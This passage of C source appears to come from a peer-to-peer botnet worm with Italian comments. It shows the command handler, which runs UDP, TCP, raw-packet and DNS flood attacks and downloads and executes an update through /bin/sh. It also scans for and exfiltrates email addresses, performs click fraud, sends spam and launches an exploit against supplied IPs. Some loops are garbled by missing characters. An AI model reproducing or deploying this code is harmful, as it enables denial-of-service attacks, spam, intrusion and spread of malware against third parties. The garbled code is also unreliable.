memset((void*)&rc,0,sizeof(struct pong_rec)); memset((void*)&kp,0,sizeof(struct kill_rec)); rc.h.tag=0x44; rc.h.seq=newseq(); rc.h.id=rp->h.id; rc.from=myip; audp_send(&udpclient,(char*)&rc,sizeof(struct pong_rec)); kp.h.tag=0x42; rc.h.seq=newseq(); kp.h.id=rp->h.id; audp_send(&udpclient,(void*)&kp,sizeof(struct kill_rec)); } break; case 0x26: { // Itinerario struct route_rec *rp=(struct route_rec *)buf; unsigned long i; if (udpserver.len < sizeof(struct route_rec)) break; if (!useseq(rp->h.seq)) { addseq(rp->h.seq); if (rp->server == -1 || rp->server == 0 || rp->server == myip) relay(inet_addr("127.0.0.1"),buf+sizeof(struct route_rec),rp->h.len-sizeof(struct route_rec)); if (rp->server == -1 || rp->server == 0) broadcast(buf,rp->h.len); else if (rp->server != myip) { if (rp->hops == 0 || rp->hops > 16) relay(rp->server,buf,rp->h.len); else { rp->hops--; broadcast(buf,rp->h.len); } } for (i=LINKS;i>0;i--) memcpy((struct route_table*)&routes[i],(struct route_table*)&routes[i-1],sizeof(struct route_table)); memset((struct route_table*)&routes[0],0,sizeof(struct route_table)); routes[0].id=rp->h.id; routes[0].ip=udpclient.in.sin_addr.s_addr; routes[0].port=htons(udpclient.in.sin_port); } } break; #ifndef LARGE_NET case 0x27: { // Aggiornamento struct update_rec *rp=(struct update_rec *)buf; struct kill_rec np; struct ainst up; char *server,done=0,bufm[4096],srv[256]; long i,d,id; int file; char check=0; if (udpserver.len < sizeof(struct update_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct update_rec)) break; memset((void*)&np,0,sizeof(struct kill_rec)); id=rp->h.id; (buf+sizeof(struct update_rec))[rp->h.len]=0; _decrypt(buf+sizeof(struct update_rec),rp->h.len); if (!strncmp(buf+sizeof(struct update_rec),"http://",7)) server=buf+sizeof(struct update_rec)+7; else server=buf+sizeof(struct update_rec); for (i=0;ih.id; audp_send(&udpclient,(void*)&np,sizeof(struct kill_rec)); if (done == 2) break; audp_close(&udpclient); audp_close(&udpserver); memset(bufm,0,1024); conv(srv,256,cpbases[0]); sprintf(bufm,"mv /tmp/tmp /tmp/init;export PATH=\"/tmp\";init %s",srv); execl("/bin/sh","/bin/sh","-c",bufm,NULL); exit(0); } break; #else case 0x27: { // Aggiornamento senderror(&udpclient,tmp->id,"Not implicated\n"); } break; #endif case 0x28: { // Lista struct list_rec *rp=(struct list_rec *)buf; struct kill_rec kp; if (udpserver.len < sizeof(struct list_rec)) break; memset((void*)&kp,0,sizeof(struct kill_rec)); syncm(&udpclient,0x46,rp->h.id); kp.h.tag=0x42; kp.h.seq=newseq(); kp.h.id=rp->h.id; audp_send(&udpclient,(void*)&kp,sizeof(struct kill_rec)); } break; case 0x29: { // Udp inondazione int flag=1,fd,i=0; char *str; struct sockaddr_in in; time_t start=time(NULL); struct udp_rec *rp=(struct udp_rec *)buf; if (udpserver.len < sizeof(struct udp_rec)) break; if (rp->size > 9216) { senderror(&udpclient,rp->h.id,"Size must be less than or equal to 9216\n"); break; } if (!isreal(rp->target)) { senderror(&udpclient,rp->h.id,"Cannot packet local networks\n"); break; } senderror(&udpclient,rp->h.id,"Udp flooding target\n"); str=(char*)malloc(rp->size); if (str == NULL) break; for (i=0;isize;i++) str[i]=rand(); memset((void*)&in,0,sizeof(struct sockaddr_in)); in.sin_addr.s_addr=rp->target; in.sin_family=AF_INET; in.sin_port=htons(rp->port); while(1) { if (rp->port == 0) in.sin_port = rand(); if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0); else { flag = fcntl(fd, F_GETFL, 0); flag |= O_NONBLOCK; fcntl(fd, F_SETFL, flag); sendto(fd,str,rp->size,0,(struct sockaddr*)&in,sizeof(in)); close(fd); } if (i >= 50) { if (time(NULL) >= start+rp->secs) break; i=0; } i++; } FREE(str); } break; case 0x2A: { // Tcp inondazione int flag=1,fd,i=0; struct sockaddr_in in; time_t start=time(NULL); struct tcp_rec *rp=(struct tcp_rec *)buf; if (udpserver.len < sizeof(struct tcp_rec)) break; if (!isreal(rp->target)) { senderror(&udpclient,rp->h.id,"Cannot packet local networks\n"); break; } senderror(&udpclient,rp->h.id,"Tcp flooding target\n"); memset((void*)&in,0,sizeof(struct sockaddr_in)); in.sin_addr.s_addr=rp->target; in.sin_family=AF_INET; in.sin_port=htons(rp->port); while(1) { if (rp->port == 0) in.sin_port = rand(); if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0); else { flag = fcntl(fd, F_GETFL, 0); flag |= O_NONBLOCK; fcntl(fd, F_SETFL, flag); connect(fd, (struct sockaddr *)&in, sizeof(in)); close(fd); } if (i >= 50) { if (time(NULL) >= start+rp->secs) break; i=0; } i++; } } break; case 0x2B: { // Generico inondazione int get; struct sockaddr_in in; struct gen_rec *rp=(struct gen_rec *)buf; time_t start=time(NULL); if (udpserver.len < sizeof(struct gen_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct gen_rec)) break; if (!isreal(rp->target)) { senderror(&udpclient,rp->h.id,"Cannot packet local networks\n"); break; } if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) break; senderror(&udpclient,rp->h.id,"Sending packets to target\n"); memset((void*)&in,0,sizeof(struct sockaddr_in)); in.sin_addr.s_addr=rp->target; in.sin_family=AF_INET; in.sin_port=htons(rp->port); while(1) { sendto(get,buf+sizeof(struct gen_rec),rp->h.len,0,(struct sockaddr *)&in,sizeof(in)); if (time(NULL) >= start+rp->secs) break; } close(get); } break; case 0x2C: { // Dns inondazione struct dns { unsigned short int id; unsigned char rd:1; unsigned char tc:1; unsigned char aa:1; unsigned char opcode:4; unsigned char qr:1; unsigned char rcode:4; unsigned char unused:2; unsigned char pr:1; unsigned char ra:1; unsigned short int que_num; unsigned short int rep_num; unsigned short int num_rr; unsigned short int num_rrsup; char buf[128]; } dnsp; unsigned long len=0,i=0,startm; int fd,flag; char *convo; struct sockaddr_in in; struct df_rec *rp=(struct df_rec *)buf; time_t start=time(NULL); if (udpserver.len < sizeof(struct df_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct df_rec)) break; if (!isreal(rp->target)) { senderror(&udpclient,rp->h.id,"Cannot packet local networks\n"); break; } senderror(&udpclient,rp->h.id,"Dns flooding target\n"); memset((void*)&in,0,sizeof(struct sockaddr_in)); in.sin_addr.s_addr=rp->target; in.sin_family=AF_INET; in.sin_port=htons(53); dnsp.rd=1; dnsp.tc=0; dnsp.aa=0; dnsp.opcode=0; dnsp.qr=0; dnsp.rcode=0; dnsp.unused=0; dnsp.pr=0; dnsp.ra=0; dnsp.que_num=256; dnsp.rep_num=0; dnsp.num_rr=0; dnsp.num_rrsup=0; convo=buf+sizeof(struct df_rec); convo[rp->h.len]=0; _decrypt(convo,rp->h.len); for (i=0,startm=0;i<=rp->h.len;i++) if (convo[i] == '.' || convo[i] == 0) { convo[i]=0; sprintf(dnsp.buf+len,"%c%s",(unsigned char)(i-startm),convo+startm); len+=1+strlen(convo+startm); startm=i+1; } dnsp.buf[len++]=0; dnsp.buf[len++]=0; dnsp.buf[len++]=1; dnsp.buf[len++]=0; dnsp.buf[len++]=1; while(1) { dnsp.id=rand(); if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0); else { flag = fcntl(fd, F_GETFL, 0); flag |= O_NONBLOCK; fcntl(fd, F_SETFL, flag); sendto(fd,(char*)&dnsp,sizeof(struct dns)+len-128,0,(struct sockaddr*)&in,sizeof(in)); close(fd); } if (i >= 50) { if (time(NULL) >= start+rp->secs) break; i=0; } i++; } } break; case 0x2D: { char ip[256]; struct escan_rec *rp=(struct escan_rec *)buf; if (udpserver.len < sizeof(struct escan_rec)) break; if (!isreal(rp->ip)) { senderror(&udpclient,rp->h.id,"Invalid IP\n"); break; } conv(ip,256,rp->ip); if (mfork() == 0) { struct _linklist *getb; struct ainst client; StartScan("/"); audp_setup(&client,(char*)ip,ESCANPORT); getb=linklist; while(getb != NULL) { unsigned long len=strlen(getb->name); audp_send(&client,getb->name,len); getb=getb->next; } audp_close(&client); exit(0); } } break; case 0x2E: { struct click_rec *rp=(struct click_rec *)buf; if (udpserver.len < sizeof(struct click_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct click_rec)) break; (buf+sizeof(struct click_rec))[rp->h.len]=0; _decrypt(buf+sizeof(struct click_rec),rp->h.len); if (mfork() == 0) { ViewWebsite(strdup(buf+sizeof(struct click_rec)),NULL); exit(0); } } break; case 0x2F: { struct spam_rec *rp=(struct spam_rec *)buf; struct kill_rec np; struct ainst up; char *server,bufm[4096],*tmp,*str; char *from=NULL,*subject=NULL,*data=NULL,*emails=NULL; long i,d; unsigned long emailcount=0; if (udpserver.len < sizeof(struct spam_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct spam_rec)) break; memset((void*)&np,0,sizeof(struct kill_rec)); (buf+sizeof(struct spam_rec))[rp->h.len]=0; _decrypt(buf+sizeof(struct spam_rec),rp->h.len); if (!strncmp(buf+sizeof(struct spam_rec),"http://",7)) server=buf+sizeof(struct spam_rec)+7; else server=buf+sizeof(struct spam_rec); for (i=0;ih.id,"Unable to connect to host\n"); exit(0); } atcp_sendmsg(&up,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",server+i+1,server); g[0]=&up; if (await(g,1,AREAD,20) != 0 || atcp_recv(&up,bufm,4096) != 0 || up.len == 0) { senderror(&udpclient,rp->h.id,"Error communicating with website\n"); exit(0); } for (d=0;dh.id,"Timed out while receiving data\n"); exit(0); } if (atcp_recv(&up,bufm,4096) != 0 || up.len <= 0) break; d=0; read: for (;d= rp->from && emailcount < rp->to) str=emails; if (bufm[d] == '\n' && emails == NULL) str=-1; break; default: str=-1; } if (str != -1 && !lpass) { int dontfree=0; if (str == NULL) { str=""; dontfree=1; } tmp=malloc(strlen(str)+2); strcpy(tmp,str); tmp[strlen(str)]=bufm[d]; tmp[strlen(str)+1]=0; if (!dontfree) free(str); str=tmp; switch (mode) { case 1: from=str; break; case 2: subject=str; break; case 3: data=str; break; case 4: if (emailcount >= rp->from && emailcount < rp->to) emails=str; break; } } if (bufm[d] == '\n') lpass=0; } } break; } atcp_close(&up); np.h.tag=0x42; np.h.seq=newseq(); np.h.id=rp->h.id; audp_send(&udpclient,(void*)&np,sizeof(struct kill_rec)); if (!from || !subject || !data || !emails) exit(0); str=emails; do { int pid; memset(bufm,0,4096); for (i=0;str[i] != 0 && str[i] != '\n';i++) bufm[i]=str[i]; if ((pid=fork()) == 0) { alarm(10); SendMail(bufm,from,subject,data); exit(0); } waitpid(pid,0,0); tmp=strchr(str,'\n'); if (tmp == NULL) break; else str=tmp+1; } while(1); exit(0); } } break; case 0x30: { struct exploit_rec *rp=(struct exploit_rec *)buf; if (udpserver.len < sizeof(struct exploit_rec)) break; if (isreal(rp->ip)) { char srv[256]; conv(srv,256,rp->ip); if (mfork() == 0) { exploit(srv); exit(0); } } } break; case 0x70: { // Avviano struct { struct addsrv_rec a; unsigned long server; } rc; struct myip_rec rp; if (!isreal(udpclient.in.sin_addr.s_addr)) break; memset((void*)&rp,0,sizeof(struct myip_rec)); rp.h.tag=0x73; rp.h.id=0; rp.ip=udpclient.in.sin_addr.s_addr; audp_send(&udpclient,(void*)&rp,sizeof(struct myip_rec)); memset((void*)&rc,0,sizeof(rc)); rc.a.h.tag=0x71; rc.a.h.id=0; rc.a.h.len=sizeof(unsigned long); rc.server=udpclient.in.sin_addr.s_addr; broute(0,(void*)&rc,sizeof(rc)); addserver(rc.server); syncm(&udpclient,0x71,0); } break; case 0x71: { // Aggiungere alla lista struct addsrv_rec *rp=(struct addsrv_rec *)buf; struct next_rec { unsigned long server; }; unsigned long a; char b=0; if (udpserver.len < sizeof(struct addsrv_rec)) break; for (a=0;rp->h.len > a*sizeof(struct next_rec) && udpserver.len > sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec));a++) { struct next_rec *fc=(struct next_rec*)(buf+sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec))); addserver(fc->server); } for (a=0;aip)) myip=rp->ip; } break; case 0x74: { // Trasmettere i vostri IP struct myip_rec rc; memset((void*)&rc,0,sizeof(struct myip_rec)); rc.h.tag=0x73; rc.h.id=0; rc.ip=udpclient.in.sin_addr.s_addr; if (!isreal(rc.ip)) break; audp_send(&udpclient,(void*)&rc,sizeof(struct myip_rec)); } break; case 0x41: // --| case 0x42: // | case 0x43: // | case 0x44: // |---> Dati dell' utente case 0x45: // | case 0x46: { // --| unsigned long a; struct header *rc=(struct header *)buf; if (udpserver.len < sizeof(struct header)) break; if (!useseq(rc->seq)) { addseq(rc->seq); for (a=0;aid) { struct ainst ts; char srv[256]; conv(srv,256,routes[a].ip); audp_setup(&ts,srv,routes[a].port); audp_close(&ts); ts.sock=udpserver.sock; audp_send(&ts,buf,udpserver.len); break; } } } break; } } } } audp_close(&udpserver); return 0; }